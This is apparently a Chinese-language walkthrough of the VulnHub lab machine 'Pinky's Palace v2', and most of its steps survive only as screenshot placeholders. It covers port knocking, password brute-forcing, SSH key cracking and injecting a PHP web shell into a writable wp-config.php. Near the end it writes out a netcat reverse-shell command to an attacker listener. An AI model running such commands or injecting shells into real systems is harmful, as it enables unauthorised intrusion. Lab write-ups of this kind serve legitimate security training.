Pinkys Palace v2

https://download.vulnhub.com/pinkyspalace/Pinkys-Palace2.zip

靶场IP:

image-20220720163433408

扫描对外端口

需要配置本地hosts

image-20220720173009082

再次刷新

image-20220720173756336

爆破web目录找到一个secret目录

image-20220720174817696

访问bambam.txt,得到一串数字

image-20220720174856763

判断要使用端口敲门,需要调整端口顺序,测试的正确顺序是:7000,666,8890

端口开启了

image-20220720175418212

IP访问会403

image-20220720175514332

要使用域名

image-20220720175528937

获取用户名

生成密码字典

爆破用户密码:pinky/Passione

image-20220720180451120
image-20220720180514903

根据提示ssh用户是stefano

image-20220720180851068

但是发现证书需要密码

提取证书哈希

SSH登录成功

我们探索一下 Stefano 的主目录,看看是否能找到一些有趣的东西。

所以我们有一个用户拥有的 SUID 二进制文件,pinky它可能(可能)是可利用的。唯一的问题是我们没有文件的读取权限。但是www-data团子有!也许我们可以找到一种方法以 user 的身份生成 shell www-data

让我们前往网络服务器根目录,看看是否有任何可写的目录或文件:

所以wp-config.php文件是可写的。<?php我们将在我们选择的文本编辑器中打开并通过在开始标记下面直接添加以下内容来注入一个简单的 PHP shell :

image-20220721094835520

设置一个监听器并nc -e /bin/bash 10.0.10.10 1337用作我们的cmd值:

image-20220721095028778
image-20220721095017835

最后更新于

这有帮助吗?